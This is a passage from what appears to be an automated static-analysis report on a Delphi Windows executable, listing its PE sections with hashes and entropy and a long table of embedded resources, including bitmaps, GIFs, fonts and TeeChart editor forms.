                  IMAGE_DIRECTORY_ENTRY_IAT0xd4c7d00x15c8.idata
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0xd510000x91e8.didata
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                  Sections

                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                  .text0x10000xc328d00xc32a001c23f6b18135b313a222b4993438dfc6unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  .data0xc340000xf5f180xf600057707d915d69e10db879945d98d9db32False0.2419850419207317data4.98697570722652IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .bss0xd2a0000x20f4c0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .idata0xd4b0000x5c500x5e0056beeeb7b323f48623a0b2e64e062a65False0.2416057180851064data4.389693246152294IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .didata0xd510000x91e80x92001fcabe78736cfaca95cba9423ec83403False0.1723030821917808data3.9804048481701213IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .edata0xd5b0000x9a0x2000538b0a5f71cff2c330ccafbe5b58c1dFalse0.2578125data1.9208874100491482IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .tls0xd5c0000x1f00x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .rdata0xd5d0000x6d0x200cb2fd71666686575f15f2e428be251f9False0.197265625data1.454281212366734IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .reloc0xd5e0000xa16340xa1800ef1d8db22b07b9fa7850e81a434b0ebaFalse0.4475755248645511data6.451176293048843IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                  .pdata0xe000000x97e9c0x9800099a369a6362e36d60c0e9f97b2d9f20aFalse0.4990475303248355data6.551197240780607IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .rsrc0xe980000x1eb2000x1eb200824df28f30254afbfd08e4cc191a402aFalse0.3454938438533978data6.741958978664275IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                  Resources

                  NameRVASizeTypeLanguageCountryZLIB Complexity
                  RT_CURSOR0xe9cea40x134dataEnglishUnited States0.38636363636363635
                  RT_CURSOR0xe9cfd80x134dataEnglishUnited States0.4642857142857143
                  RT_CURSOR0xe9d10c0x134dataEnglishUnited States0.4805194805194805
                  RT_CURSOR0xe9d2400x134dataEnglishUnited States0.38311688311688313
                  RT_CURSOR0xe9d3740x134dataEnglishUnited States0.36038961038961037
                  RT_CURSOR0xe9d4a80x134dataEnglishUnited States0.4090909090909091
                  RT_CURSOR0xe9d5dc0x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4967532467532468
                  RT_CURSOR0xe9d7100x134Targa image data - Map 64 x 65536 x 1 +32 "\001"EnglishUnited States0.38636363636363635
                  RT_BITMAP0xe9d8440x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
                  RT_BITMAP0xe9da140x1e4Device independent bitmap graphic, 36 x 19 x 4, image size 380EnglishUnited States0.46487603305785125
                  RT_BITMAP0xe9dbf80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
                  RT_BITMAP0xe9ddc80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39870689655172414
                  RT_BITMAP0xe9df980x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.4245689655172414
                  RT_BITMAP0xe9e1680x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5021551724137931
                  RT_BITMAP0xe9e3380x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5064655172413793
                  RT_BITMAP0xe9e5080x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
                  RT_BITMAP0xe9e6d80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5344827586206896
                  RT_BITMAP0xe9e8a80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
                  RT_BITMAP0xe9ea780xc0Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colorsEnglishUnited States0.5208333333333334
                  RT_BITMAP0xe9eb380xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colorsEnglishUnited States0.42857142857142855
                  RT_BITMAP0xe9ec180xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colorsEnglishUnited States0.4955357142857143
                  RT_BITMAP0xe9ecf80xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colorsEnglishUnited States0.38392857142857145
                  RT_BITMAP0xe9edd80xc0Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colorsEnglishUnited States0.4947916666666667
                  RT_BITMAP0xe9ee980xc0Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colorsEnglishUnited States0.484375
                  RT_BITMAP0xe9ef580xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colorsEnglishUnited States0.42410714285714285
                  RT_BITMAP0xe9f0380xc0Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colorsEnglishUnited States0.5104166666666666
                  RT_BITMAP0xe9f0f80xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colorsEnglishUnited States0.5
                  RT_BITMAP0xe9f1d80xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128EnglishUnited States0.4870689655172414
                  RT_BITMAP0xe9f2c00xc0Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colorsEnglishUnited States0.4895833333333333
                  RT_BITMAP0xe9f3800x188Device independent bitmap graphic, 24 x 24 x 4, image size 288EnglishUnited States0.34438775510204084
                  RT_BITMAP0xe9f5080x188Device independent bitmap graphic, 24 x 24 x 4, image size 288, 16 important colorsEnglishUnited States0.45918367346938777
                  RT_BITMAP0xe9f6900x188Device independent bitmap graphic, 24 x 24 x 4, image size 288, 16 important colorsEnglishUnited States0.30357142857142855
                  RT_BITMAP0xe9f8180x188Device independent bitmap graphic, 24 x 24 x 4, image size 288, 16 important colorsEnglishUnited States0.3392857142857143
                  RT_BITMAP0xe9f9a00x668Device independent bitmap graphic, 24 x 24 x 8, image size 576, 256 important colorsEnglishUnited States0.3829268292682927
                  RT_BITMAP0xea00080x668Device independent bitmap graphic, 24 x 24 x 8, image size 576, 256 important colorsEnglishUnited States0.39146341463414636
                  RT_BITMAP0xea06700x668Device independent bitmap graphic, 24 x 24 x 8, image size 576, 256 important colorsEnglishUnited States0.3853658536585366
                  RT_BITMAP0xea0cd80x188Device independent bitmap graphic, 24 x 24 x 4, image size 288, 16 important colorsEnglishUnited States0.42857142857142855
                  RT_BITMAP0xea0e600x668Device independent bitmap graphic, 24 x 24 x 8, image size 576, 256 important colorsEnglishUnited States0.39207317073170733
                  RT_BITMAP0xea14c80x110Device independent bitmap graphic, 24 x 14 x 4, image size 168EnglishUnited States0.40808823529411764
                  RT_BITMAP0xea15d80x110Device independent bitmap graphic, 24 x 14 x 4, image size 168EnglishUnited States0.4117647058823529
                  RT_BITMAP0xea16e80x70Device independent bitmap graphic, 16 x 16 x 1, image size 64EnglishUnited States0.3125
                  RT_BITMAP0xea17580x70Device independent bitmap graphic, 16 x 16 x 1, image size 64EnglishUnited States0.41964285714285715
                  RT_BITMAP0xea17c80x70Device independent bitmap graphic, 16 x 16 x 1, image size 64EnglishUnited States0.3482142857142857
                  RT_BITMAP0xea18380x70Device independent bitmap graphic, 16 x 16 x 1, image size 64EnglishUnited States0.38392857142857145
                  RT_BITMAP0xea18a80x70Device independent bitmap graphic, 16 x 16 x 1, image size 64EnglishUnited States0.3392857142857143
                  RT_BITMAP0xea19180x70Device independent bitmap graphic, 16 x 16 x 1, image size 64EnglishUnited States0.32142857142857145
                  RT_BITMAP0xea19880x70Device independent bitmap graphic, 16 x 16 x 1, image size 64EnglishUnited States0.36607142857142855
                  RT_BITMAP0xea19f80x70Device independent bitmap graphic, 16 x 16 x 1, image size 64EnglishUnited States0.33035714285714285
                  RT_BITMAP0xea1a680x70Device independent bitmap graphic, 16 x 16 x 1, image size 64EnglishUnited States0.41964285714285715
                  RT_BITMAP0xea1ad80x70Device independent bitmap graphic, 16 x 16 x 1, image size 64EnglishUnited States0.30357142857142855
                  RT_BITMAP0xea1b480x70Device independent bitmap graphic, 16 x 16 x 1, image size 64EnglishUnited States0.33035714285714285
                  RT_BITMAP0xea1bb80x70Device independent bitmap graphic, 16 x 16 x 1, image size 64EnglishUnited States0.41964285714285715
                  RT_BITMAP0xea1c280x138Device independent bitmap graphic, 28 x 13 x 4, image size 208EnglishUnited States0.41025641025641024
                  RT_BITMAP0xea1d600x138Device independent bitmap graphic, 28 x 13 x 4, image size 208EnglishUnited States0.27564102564102566
                  RT_BITMAP0xea1e980x138Device independent bitmap graphic, 28 x 13 x 4, image size 208EnglishUnited States0.3685897435897436
                  RT_BITMAP0xea1fd00x138Device independent bitmap graphic, 28 x 13 x 4, image size 208EnglishUnited States0.3685897435897436
                  RT_BITMAP0xea21080x138Device independent bitmap graphic, 28 x 13 x 4, image size 208EnglishUnited States0.34294871794871795
                  RT_BITMAP0xea22400x138Device independent bitmap graphic, 28 x 13 x 4, image size 208EnglishUnited States0.3717948717948718
                  RT_BITMAP0xea23780x104Device independent bitmap graphic, 20 x 13 x 4, image size 156EnglishUnited States0.5038461538461538
                  RT_BITMAP0xea247c0x138Device independent bitmap graphic, 28 x 13 x 4, image size 208EnglishUnited States0.4326923076923077
                  RT_BITMAP0xea25b40x104Device independent bitmap graphic, 20 x 13 x 4, image size 156EnglishUnited States0.5153846153846153
                  RT_BITMAP0xea26b80x188Device independent bitmap graphic, 24 x 24 x 4, image size 288, 16 important colorsEnglishUnited States0.4107142857142857
                  RT_BITMAP0xea28400x188Device independent bitmap graphic, 24 x 24 x 4, image size 288, 16 important colorsEnglishUnited States0.3239795918367347
                  RT_BITMAP0xea29c80x188Device independent bitmap graphic, 24 x 24 x 4, image size 288EnglishUnited States0.31887755102040816
                  RT_BITMAP0xea2b500x188Device independent bitmap graphic, 24 x 24 x 4, image size 288, 16 important colorsEnglishUnited States0.30612244897959184
                  RT_BITMAP0xea2cd80x188Device independent bitmap graphic, 24 x 24 x 4, image size 288EnglishUnited States0.32142857142857145
                  RT_BITMAP0xea2e600x668Device independent bitmap graphic, 24 x 24 x 8, image size 576, 256 important colorsEnglishUnited States0.35548780487804876
                  RT_BITMAP0xea34c80x188Device independent bitmap graphic, 24 x 24 x 4, image size 288, 16 important colorsEnglishUnited States0.375
                  RT_BITMAP0xea36500x668Device independent bitmap graphic, 24 x 24 x 8, image size 576EnglishUnited States0.44939024390243903
                  RT_BITMAP0xea3cb80x188Device independent bitmap graphic, 24 x 24 x 4, image size 288, 16 important colorsEnglishUnited States0.3826530612244898
                  RT_BITMAP0xea3e400x668Device independent bitmap graphic, 24 x 24 x 8, image size 576, 256 important colorsEnglishUnited States0.3853658536585366
                  RT_BITMAP0xea44a80x668Device independent bitmap graphic, 24 x 24 x 8, image size 576, 256 important colorsEnglishUnited States0.43902439024390244
                  RT_BITMAP0xea4b100xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colorsEnglishUnited States0.3794642857142857
                  RT_ICON0xea4bf00x4c28Device independent bitmap graphic, 128 x 256 x 8, image size 00.20460607304062373
                  RT_ICON0xea98180x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.4031791907514451
                  RT_ICON0xea9d800x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.6814079422382672
                  RT_ICON0xeaa6280xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.517590618336887
                  RT_ICON0xeab4d00x5c70PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9795892494929006
                  RT_DIALOG0xeb11400x52data0.7682926829268293
                  RT_DIALOG0xeb11940x52data0.7560975609756098
                  RT_STRING0xeb11e80x80data0.6171875
                  RT_STRING0xeb12680x3d4data0.4173469387755102
                  RT_STRING0xeb163c0x4d4data0.31957928802589
                  RT_STRING0xeb1b100x450data0.3269927536231884
                  RT_STRING0xeb1f600x2f0data0.42686170212765956
                  RT_STRING0xeb22500x128data0.6013513513513513
                  RT_STRING0xeb23780x280data0.4921875
                  RT_STRING0xeb25f80x4c0data0.35855263157894735
                  RT_STRING0xeb2ab80x560data0.3633720930232558
                  RT_STRING0xeb30180x9bcdata0.28892455858747995
                  RT_STRING0xeb39d40x854data0.2687617260787992
                  RT_STRING0xeb42280x344data0.4090909090909091
                  RT_STRING0xeb456c0x460data0.36339285714285713
                  RT_STRING0xeb49cc0x448data0.3476277372262774
                  RT_STRING0xeb4e140x448data0.2937956204379562
                  RT_STRING0xeb525c0x544data0.3954005934718101
                  RT_STRING0xeb57a00x274data0.4697452229299363
                  RT_STRING0xeb5a140x380data0.2622767857142857
                  RT_STRING0xeb5d940x334AmigaOS bitmap font "x", fc_YSize 30208, 17664 elements, 2nd " ", 3rd "i"0.424390243902439
                  RT_STRING0xeb60c80x45cdata0.4229390681003584
                  RT_STRING0xeb65240x304data0.4365284974093264
                  RT_STRING0xeb68280x3b0data0.3834745762711864
                  RT_STRING0xeb6bd80x274data0.5127388535031847
                  RT_STRING0xeb6e4c0x2dcdata0.4562841530054645
                  RT_STRING0xeb71280x5acdata0.3622589531680441
                  RT_STRING0xeb76d40x360data0.3784722222222222
                  RT_STRING0xeb7a340x334data0.424390243902439
                  RT_STRING0xeb7d680x358data0.39602803738317754
                  RT_STRING0xeb80c00x394data0.3307860262008734
                  RT_STRING0xeb84540x3e8data0.446
                  RT_STRING0xeb883c0x520data0.3445121951219512
                  RT_STRING0xeb8d5c0x3dcdata0.3248987854251012
                  RT_STRING0xeb91380x2b8data0.4870689655172414
                  RT_STRING0xeb93f00x36cdata0.4337899543378995
                  RT_STRING0xeb975c0x258data0.48833333333333334
                  RT_STRING0xeb99b40xbcdata0.675531914893617
                  RT_STRING0xeb9a700x1f8data0.4623015873015873
                  RT_STRING0xeb9c680x198data0.5588235294117647
                  RT_STRING0xeb9e000x378data0.4099099099099099
                  RT_STRING0xeba1780x400data0.3642578125
                  RT_STRING0xeba5780x428data0.3768796992481203
                  RT_STRING0xeba9a00x53cdata0.32164179104477614
                  RT_STRING0xebaedc0x280data0.3265625
                  RT_STRING0xebb15c0x408data0.4001937984496124
                  RT_STRING0xebb5640x6d0data0.3256880733944954
                  RT_STRING0xebbc340x468data0.3333333333333333
                  RT_STRING0xebc09c0x330data0.3909313725490196
                  RT_STRING0xebc3cc0x35cdata0.3755813953488372
                  RT_STRING0xebc7280x3c4data0.36721991701244816
                  RT_STRING0xebcaec0x3fcdata0.3764705882352941
                  RT_STRING0xebcee80xd0data0.5288461538461539
                  RT_STRING0xebcfb80xb8data0.6467391304347826
                  RT_STRING0xebd0700x2c0data0.46732954545454547
                  RT_STRING0xebd3300x434data0.3308550185873606
                  RT_STRING0xebd7640x360data0.38425925925925924
                  RT_STRING0xebdac40x2ecdata0.37566844919786097
                  RT_STRING0xebddb00x31cdata0.34296482412060303
                  RT_RCDATA0xebe0cc0x627eJPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=6, datetime=2010:05:11 20:59:59], baseline, precision 8, 256x256, components 3EnglishUnited States0.9922265408106608
                  RT_RCDATA0xec434c0x10data1.5
                  RT_RCDATA0xec435c0x1536MS Windows icon resource - 2 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixelEnglishUnited States0.6550644567219153
                  RT_RCDATA0xec58940x359GIF image data, version 89a, 16 x 16EnglishUnited States0.15635939323220538
                  RT_RCDATA0xec5bf00x378GIF image data, version 89a, 21 x 21EnglishUnited States0.5529279279279279
                  RT_RCDATA0xec5f680x12cGIF image data, version 89a, 10 x 12EnglishUnited States0.83
                  RT_RCDATA0xec60940x129GIF image data, version 89a, 10 x 12EnglishUnited States0.7575757575757576
                  RT_RCDATA0xec61c00x4c8GIF image data, version 89a, 24 x 24EnglishUnited States0.6282679738562091
                  RT_RCDATA0xec66880x4b5GIF image data, version 89a, 24 x 24EnglishUnited States0.5526970954356847
                  RT_RCDATA0xec6b400x42eGIF image data, version 89a, 24 x 24EnglishUnited States0.5112149532710281
                  RT_RCDATA0xec6f700x42eGIF image data, version 89a, 24 x 24EnglishUnited States0.4766355140186916
                  RT_RCDATA0xec73a00x432GIF image data, version 89a, 24 x 24EnglishUnited States0.5027932960893855
                  RT_RCDATA0xec77d40x434GIF image data, version 89a, 24 x 24EnglishUnited States0.4758364312267658
                  RT_RCDATA0xec7c080x4daGIF image data, version 89a, 24 x 24EnglishUnited States0.6191626409017713
                  RT_RCDATA0xec80e40x4c1GIF image data, version 89a, 24 x 24EnglishUnited States0.5825801150369762
                  RT_RCDATA0xec85a80x449GIF image data, version 89a, 24 x 24EnglishUnited States0.5077484047402006
                  RT_RCDATA0xec89f40x455GIF image data, version 89a, 24 x 24EnglishUnited States0.5067628494138864
                  RT_RCDATA0xec8e4c0x4ceGIF image data, version 89a, 24 x 24EnglishUnited States0.6699186991869919
                  RT_RCDATA0xec931c0x4b9GIF image data, version 89a, 24 x 24EnglishUnited States0.5665839536807279
                  RT_RCDATA0xec97d80x32eGIF image data, version 89a, 24 x 24EnglishUnited States0.9582309582309583
                  RT_RCDATA0xec9b080x30eGIF image data, version 89a, 24 x 24EnglishUnited States0.8491048593350383
                  RT_RCDATA0xec9e180x444GIF image data, version 89a, 24 x 24EnglishUnited States0.5265567765567766
                  RT_RCDATA0xeca25c0x44fGIF image data, version 89a, 24 x 24EnglishUnited States0.4877606527651859
                  RT_RCDATA0xeca6ac0x4b5GIF image data, version 89a, 24 x 24EnglishUnited States0.6182572614107884
                  RT_RCDATA0xecab640x4abGIF image data, version 89a, 24 x 24EnglishUnited States0.5581589958158996
                  RT_RCDATA0xecb0100x480GIF image data, version 89a, 24 x 24EnglishUnited States0.5815972222222222
                  RT_RCDATA0xecb4900x46aGIF image data, version 89a, 24 x 24EnglishUnited States0.5389380530973451
                  RT_RCDATA0xecb8fc0x679HTML document, ASCII text, with CRLF, LF line terminatorsEnglishUnited States0.46107423053711527
                  RT_RCDATA0xecbf780xacfGIF image data, version 89a, 32 x 32EnglishUnited States0.6841344416335381
                  RT_RCDATA0xecca480xe34GIF image data, version 89a, 105 x 141EnglishUnited States1.0030253025302531
                  RT_RCDATA0xecd87c0xa25GIF image data, version 89a, 171 x 75EnglishUnited States1.0042356565267616
                  RT_RCDATA0xece2a40x4bGIF image data, version 89a, 16 x 16EnglishUnited States0.9733333333333334
                  RT_RCDATA0xece2f00x3fGIF image data, version 89a, 12 x 16EnglishUnited States1.0317460317460319
                  RT_RCDATA0xece3300x6eGIF image data, version 89a, 16 x 16EnglishUnited States1.009090909090909
                  RT_RCDATA0xece3a00x50GIF image data, version 89a, 16 x 16EnglishUnited States1.025
                  RT_RCDATA0xece3f00x6cGIF image data, version 89a, 16 x 16EnglishUnited States1.0092592592592593
                  RT_RCDATA0xece45c0x4fGIF image data, version 89a, 16 x 16EnglishUnited States1.0253164556962024
                  RT_RCDATA0xece4ac0x6fGIF image data, version 89a, 17 x 16EnglishUnited States1.018018018018018
                  RT_RCDATA0xece51c0x41GIF image data, version 89a, 15 x 15EnglishUnited States0.9846153846153847
                  RT_RCDATA0xece5600x3cGIF image data, version 89a, 16 x 12EnglishUnited States1.0333333333333334
                  RT_RCDATA0xece59c0x69GIF image data, version 89a, 16 x 16EnglishUnited States1.019047619047619
                  RT_RCDATA0xece6080x4dGIF image data, version 89a, 16 x 16EnglishUnited States1.025974025974026
                  RT_RCDATA0xece6580x71GIF image data, version 89a, 16 x 17EnglishUnited States1.079646017699115
                  RT_RCDATA0xece6cc0x69GIF image data, version 89a, 16 x 16EnglishUnited States1.0095238095238095
                  RT_RCDATA0xece7380x4dGIF image data, version 89a, 16 x 16EnglishUnited States1.025974025974026
                  RT_RCDATA0xece7880x45aHTML document, ASCII text, with CRLF line terminatorsEnglishUnited States0.47217235188509876
                  RT_RCDATA0xecebe40x36GIF image data, version 89a, 1 x 1EnglishUnited States1.037037037037037
                  RT_RCDATA0xecec1c0x91GIF image data, version 89a, 16 x 16EnglishUnited States0.8137931034482758
                  RT_RCDATA0xececb00x82GIF image data, version 89a, 16 x 16EnglishUnited States0.7769230769230769
                  RT_RCDATA0xeced340x6cGIF image data, version 89a, 11 x 9EnglishUnited States0.6944444444444444
                  RT_RCDATA0xeceda00x9eGIF image data, version 89a, 16 x 16EnglishUnited States0.8354430379746836
                  RT_RCDATA0xecee400x6fGIF image data, version 89a, 11 x 9EnglishUnited States0.7027027027027027
                  RT_RCDATA0xeceeb00x356GIF image data, version 89a, 16 x 16EnglishUnited States0.12295081967213115
                  RT_RCDATA0xecf2080x355GIF image data, version 89a, 16 x 16EnglishUnited States0.123094958968347
                  RT_RCDATA0xecf5600x355GIF image data, version 89a, 16 x 16EnglishUnited States0.12192262602579132
                  RT_RCDATA0xecf8b80x361GIF image data, version 89a, 16 x 16EnglishUnited States0.13179190751445086
                  RT_RCDATA0xecfc1c0x3aeGIF image data, version 89a, 16 x 16EnglishUnited States0.25796178343949044
                  RT_RCDATA0xecffcc0x3b5GIF image data, version 89a, 16 x 16EnglishUnited States0.291886195995785
                  RT_RCDATA0xed03840x38cGIF image data, version 89a, 16 x 16EnglishUnited States0.21585903083700442
                  RT_RCDATA0xed07100x41aGIF image data, version 89a, 16 x 16EnglishUnited States0.6266666666666667
                  RT_RCDATA0xed0b2c0x36eGIF image data, version 89a, 16 x 16EnglishUnited States0.15945330296127563
                  RT_RCDATA0xed0e9c0x36dGIF image data, version 89a, 16 x 16EnglishUnited States0.1573546180159635
                  RT_RCDATA0xed120c0x354GIF image data, version 89a, 16 x 16EnglishUnited States0.11854460093896714
                  RT_RCDATA0xed15600x394GIF image data, version 89a, 16 x 16EnglishUnited States0.1965065502183406
                  RT_RCDATA0xed18f40x3b0GIF image data, version 89a, 16 x 16EnglishUnited States0.2552966101694915
                  RT_RCDATA0xed1ca40x3e7GIF image data, version 89a, 16 x 16EnglishUnited States0.42842842842842843
                  RT_RCDATA0xed208c0x3eeGIF image data, version 89a, 16 x 16EnglishUnited States0.6272365805168986
                  RT_RCDATA0xed247c0x368GIF image data, version 89a, 16 x 16EnglishUnited States0.13876146788990826
                  RT_RCDATA0xed27e40x37fGIF image data, version 89a, 16 x 16EnglishUnited States0.28044692737430166
                  RT_RCDATA0xed2b640x37fGIF image data, version 89a, 16 x 16EnglishUnited States0.27932960893854747
                  RT_RCDATA0xed2ee40x362GIF image data, version 89a, 16 x 16EnglishUnited States0.13279445727482678
                  RT_RCDATA0xed32480x531bASCII text, with very long lines (16079)EnglishUnited States0.2575323149236193
                  RT_RCDATA0xed85640x3457ASCII text, with very long lines (13399), with no line terminatorsEnglishUnited States0.27718486454213
                  RT_RCDATA0xedb9bc0x38c1ASCII text, with very long lines (14529), with no line terminatorsEnglishUnited States0.2771697983343657
                  RT_RCDATA0xedf2800xa64ASCII text, with very long lines (2660), with no line terminatorsEnglishUnited States0.3669172932330827
                  RT_RCDATA0xedfce40xbe1ASCII text, with very long lines (3041), with no line terminatorsEnglishUnited States0.3909898059848734
                  RT_RCDATA0xee08c80x134aASCII text, with very long lines (4938), with no line terminatorsEnglishUnited States0.24807614418793034
                  RT_RCDATA0xee1c140x677ASCII text, with very long lines (1655), with no line terminatorsEnglishUnited States0.313595166163142
                  RT_RCDATA0xee228c0x4cdHTML document, ASCII text, with very long lines (1229), with no line terminatorsEnglishUnited States0.49308380797396256
                  RT_RCDATA0xee275c0x1775ASCII text, with very long lines (6005), with no line terminatorsEnglishUnited States0.24196502914238135
                  RT_RCDATA0xee3ed40xdcdASCII text, with very long lines (3533), with no line terminatorsEnglishUnited States0.3014435324087178
                  RT_RCDATA0xee4ca40x17278HTML document, Unicode text, UTF-8 text, with very long lines (32769)EnglishUnited States0.354924082665542
                  RT_RCDATA0xefbf1c0xd0fASCII text, with very long lines (3142)EnglishUnited States0.4552796889021837
                  RT_RCDATA0xefcc2c0x6eccASCII text, with very long lines (28364), with no line terminatorsEnglishUnited States0.2744676350303201
                  RT_RCDATA0xf03af80xc9c7ASCII text, with very long lines (51655), with no line terminatorsEnglishUnited States0.24799148194753654
                  RT_RCDATA0xf104c00x1e82ASCII text, with very long lines (7146), with CRLF line terminatorsEnglishUnited States0.3613316261203585
                  RT_RCDATA0xf123440xdb2ASCII text, with CRLF line terminatorsEnglishUnited States0.32857957786651454
                  RT_RCDATA0xf130f80x1ea0data0.43839285714285714
                  RT_RCDATA0xf14f980x5c7Delphi compiled form 'TAxisIncrement'0.5233265720081136
                  RT_RCDATA0xf155600x3a7Delphi compiled form 'TAxisMaxMin'0.5187165775401069
                  RT_RCDATA0xf159080xc27Delphi compiled form 'TBackImageEditor'0.37254901960784315
                  RT_RCDATA0xf165300x108Delphi compiled form 'TBaseFunctionEditor'0.7954545454545454
                  RT_RCDATA0xf166380x311Delphi compiled form 'TBaseSourceEditor'0.619108280254777
                  RT_RCDATA0xf1694c0x49eDelphi compiled form 'TBMPOptions'0.5609137055837563
                  RT_RCDATA0xf16dec0x19b77Delphi compiled form 'TBrushDialog'0.6545877438648122
                  RT_RCDATA0xf309640x2deaDelphi compiled form 'TChartEditForm'0.29275140377743747
                  RT_RCDATA0xf337500x1759Delphi compiled form 'TChartPreview'0.3399698845574703
                  RT_RCDATA0xf34eac0x415c8TrueType Font data, 19 tables, 1st "GPOS", 16 names, Macintosh, \(g\)\252 fonts 1999\251ElektraMediumTransType 3 MAC;Elektra;001.000;18/07/06 23:22:47ElektraVerEnglishUnited States0.10237935156133274
                  RT_RCDATA0xf764740x5f80TrueType Font data, 15 tables, 1st "OS/2", 21 names, UnicodeEnglishUnited States0.3445271596858639
                  RT_RCDATA0xf7c3f40x254Delphi compiled form 'TEMFOptions'0.6157718120805369
                  RT_RCDATA0xf7c6480x37e0Delphi compiled form 'TFilterGallery'0.9542785234899329
                  RT_RCDATA0xf7fe280x15cfDelphi compiled form 'TFiltersEditor'0.33799032778076304
                  RT_RCDATA0xf813f80x151Delphi compiled form 'TForm1'0.7210682492581603
                  RT_RCDATA0xf8154c0x99eDelphi compiled form 'TFormatEditor'0.3895207148659626
                  RT_RCDATA0xf81eec0x6cdDelphi compiled form 'TFormPreviewPanelEditor'0.44055140723721997
                  RT_RCDATA0xf825bc0x12acDelphi compiled form 'TFormTee3D'0.34246861924686195
                  RT_RCDATA0xf838680x3d05Delphi compiled form 'TFormTeeAxis'0.2504961270085142
                  RT_RCDATA0xf875700x2853Delphi compiled form 'TFormTeeGeneral'0.32645548774581035
                  RT_RCDATA0xf89dc40x1b20Delphi compiled form 'TFormTeeLegend'0.32171658986175117
                  RT_RCDATA0xf8b8e40x613Delphi compiled form 'TFormTeePage'0.4553054662379421
                  RT_RCDATA0xf8bef80x1034Delphi compiled form 'TFormTeePanel'0.3276277724204436
                  RT_RCDATA0xf8cf2c0x47c6Delphi compiled form 'TFormTeeSeries'0.2725590508326984
                  RT_RCDATA0xf916f40x12fcDelphi compiled form 'TFormTeeShape'0.33065843621399177
                  RT_RCDATA0xf929f00x78eDelphi compiled form 'TFormTeeTitle'0.4239917269906929
                  RT_RCDATA0xf931800x9d3Delphi compiled form 'TFormTeeWall'0.37296222664015904
                  RT_RCDATA0xf93b540x59aDelphi compiled form 'TMarginsEditor'0.39609483960948394
                  RT_RCDATA0xf940f00x396Delphi compiled form 'TMouseCursorEdit'0.6089324618736384
                  RT_RCDATA0xf944880x33c2HTML document, ASCII text, with CRLF line terminatorsDutchBelgium0.20422641509433961
                  RT_RCDATA0xf9784c0xc59Delphi compiled form 'TPenDialog'0.4134767478645998
                  RT_RCDATA0xf984a80x698Delphi compiled form 'TSelectListForm'0.3915876777251185
                  RT_RCDATA0xf98b400x1329Delphi compiled form 'TSeriesPointerEditor'0.3547400611620795
                  RT_RCDATA0xf99e6c0x558Delphi compiled form 'TStringsEditor'0.4641812865497076
                  RT_RCDATA0xf9a3c40x919Delphi compiled form 'TSymbolEditor'0.3714040360669815
                  RT_RCDATA0xf9ace00xd076Delphi compiled form 'TTeeAboutForm'0.9010793389049208
                  RT_RCDATA0xfa7d580x35dDelphi compiled form '\016TTeeExportForm'0.5319396051103368
                  RT_RCDATA0xfa80b80x1c55Delphi compiled form 'TTeeExportFormBase'0.33655039294085204
                  RT_RCDATA0xfa9d100xc85Delphi compiled form 'TTeeFontEditor'0.39469578783151327
                  RT_RCDATA0xfaa9980x514Delphi compiled form '\016TTeeFuncEditor'0.47
                  RT_RCDATA0xfaaeac0x3c3Delphi compiled form '\022TTeeFunctionEditor\021TeeFunctionEditor\004Left\003>\001\003Top\003\340'0.48078920041536866
                  RT_RCDATA0xfab2700x17c0Delphi compiled form 'TTeeGallery'0.3483552631578947
                  RT_RCDATA0xfaca300x1661Delphi compiled form 'TTeeGradientEditor'0.3459591551754233
